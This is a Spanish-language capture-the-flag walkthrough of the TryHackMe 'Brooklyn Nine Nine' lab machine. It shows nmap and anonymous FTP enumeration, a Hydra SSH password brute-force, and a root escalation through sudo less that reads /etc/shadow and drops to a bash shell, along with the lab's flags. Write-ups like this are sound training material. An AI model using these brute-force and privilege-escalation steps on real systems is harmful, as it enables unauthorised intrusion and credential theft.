[TryHackMe] Brooklyn Nine Nine

Hoy vamos a hackear la maquina de TryHackMe llamada Broklyn Nine Nine. Podeis descargarla desde el siguiente enlace: https://tryhackme.com/room/brooklynninenine
  • Video
  • Enumeration
  • Empezamos con un nmap para ver que puertos tiene abiertos.
    ~ > nmap -A 10.10.60.217 Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-08 08:13 CEST Nmap scan report for 10.10.60.217 Host is up (0.057s latency). Not shown: 997 closed ports PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 3.0.3 | ftp-anon: Anonymous FTP login allowed (FTP code 230) |_-rw-r--r-- 1 0 0 119 May 17 23:17 note_to_jake.txt | ftp-syst: | STAT: | FTP server status: | Connected to ::ffff:10.9.24.208 | Logged in as ftp | TYPE: ASCII | No session bandwidth limit | Session timeout in seconds is 300 | Control connection is plain text | Data connections will be plain text | At session startup, client count was 3 | vsFTPd 3.0.3 - secure, fast, stable |_End of status 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 16:7f:2f:fe:0f:ba:98:77:7d:6d:3e:b6:25:72:c6:a3 (RSA) | 256 2e:3b:61:59:4b:c4:29:b5:e8:58:39:6f:6f:e9:9b:ee (ECDSA) |_ 256 ab:16:2e:79:20:3c:9b:0a:01:9c:8c:44:26:01:58:04 (ED25519) 80/tcp open http Apache httpd 2.4.29 ((Ubuntu)) |_http-server-header: Apache/2.4.29 (Ubuntu) |_http-title: Site doesn't have a title (text/html). Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 11.98 seconds
    Nmap nos muestra que nos podemos conectar con el usuario anonymous al ftp. Nos conectamos al ftp para ver si vemos algo interesante.
    ~ > ftp 10.10.60.217 Connected to 10.10.60.217. 220 (vsFTPd 3.0.3) Name (10.10.60.217:sml): anonymous 331 Please specify the password. Password: 230 Login successful. Remote system type is UNIX. Using binary mode to transfer files. ftp> dir 200 PORT command successful. Consider using PASV. 150 Here comes the directory listing. -rw-r--r-- 1 0 0 119 May 17 23:17 note_to_jake.txt 226 Directory send OK.
    Vemos el fichero note_to_jake.txt, lo descargamos.
    ftp> get note_to_jake.txt local: note_to_jake.txt remote: note_to_jake.txt 200 PORT command successful. Consider using PASV. 150 Opening BINARY mode data connection for note_to_jake.txt (119 bytes). 226 Transfer complete. 119 bytes received in 0.11 secs (1.0441 kB/s) ftp> exit 221 Goodbye.
    Miramos el contenido del fichero.
    ~ > cat note_to_jake.txt 12s From Amy, Jake please change your password. It is too weak and holt will be mad if someone hacks into the nine nine
    Podemos ver que Amy le dice a Jake que cambie su password ya que es debil. Teniendo esta informacion, utilizamos hydra para hacer bruteforce de la password de jake por ssh.
    ~ > hydra -l jake -P rockyou.txt 10.10.60.217 ssh Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes. Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-08-08 08:14:35 [WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4 [WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore [DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task [DATA] attacking ssh://10.10.60.217:22/ [22][ssh] host: 10.10.60.217 login: jake password: 987654321
    Obtenemos la password! Utilizamos los credenciales de jake para conectarnos por ssh...
  • Low Shell
  • Nos logueamos como jake.
    ~ > ssh jake@10.10.60.217 jake@10.10.60.217's password: Last login: Tue May 26 08:56:58 2020
  • user.txt
  • Exploramos el sistema para buscar la flag de user.
    jake@brookly_nine_nine:/home$ cd /home jake@brookly_nine_nine:/home$ ls amy holt jake jake@brookly_nine_nine:/home$ cd holt jake@brookly_nine_nine:/home/holt$ ls -la total 48 drwxr-xr-x 6 holt holt 4096 May 26 09:01 . drwxr-xr-x 5 root root 4096 May 18 10:21 .. -rw------- 1 holt holt 18 May 26 09:01 .bash_history -rw-r--r-- 1 holt holt 220 May 17 21:42 .bash_logout -rw-r--r-- 1 holt holt 3771 May 17 21:42 .bashrc drwx------ 2 holt holt 4096 May 18 10:24 .cache drwx------ 3 holt holt 4096 May 18 10:24 .gnupg drwxrwxr-x 3 holt holt 4096 May 17 21:46 .local -rw-r--r-- 1 holt holt 807 May 17 21:42 .profile drwx------ 2 holt holt 4096 May 18 14:45 .ssh -rw------- 1 root root 110 May 18 17:12 nano.save -rw-rw-r-- 1 holt holt 33 May 17 21:49 user.txt jake@brookly_nine_nine:/home/holt$ cat user.txt ee11cbb19052e40b07aac0ca060c23ee
    Miramos si podemos hacer algo con sudo.
    jake@brookly_nine_nine:~$ sudo -l Matching Defaults entries for jake on brookly_nine_nine: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/ snap/bin User jake may run the following commands on brookly_nine_nine: (ALL) NOPASSWD: /usr/bin/less
  • Privilege Escalation
  • Vemos que podemos utilizar less, el cual nos puede permitir obtener una shell con privilegios. Para ello ejecutamos:
    jake@brookly_nine_nine:~$ sudo /usr/bin/less /etc/shadow
    Una vez se nos este mostrando el fichero escribimos:
    !/bin/bash
    Y ya tendriamos una shell de root
    root@brookly_nine_nine:~# id uid=0(root) gid=0(root) groups=0(root)
  • root.txt
  • root@brookly_nine_nine:/root# cat /root/root.txt -- Creator : Fsociety2006 -- Congratulations in rooting Brooklyn Nine Nine Here is the flag: 63a9f0ea7bb98050796b649e85481845 Enjoy!! root@brookly_nine_nine:/root#
  • End
  • Con esto, ya habriamos finalizado la maquina :)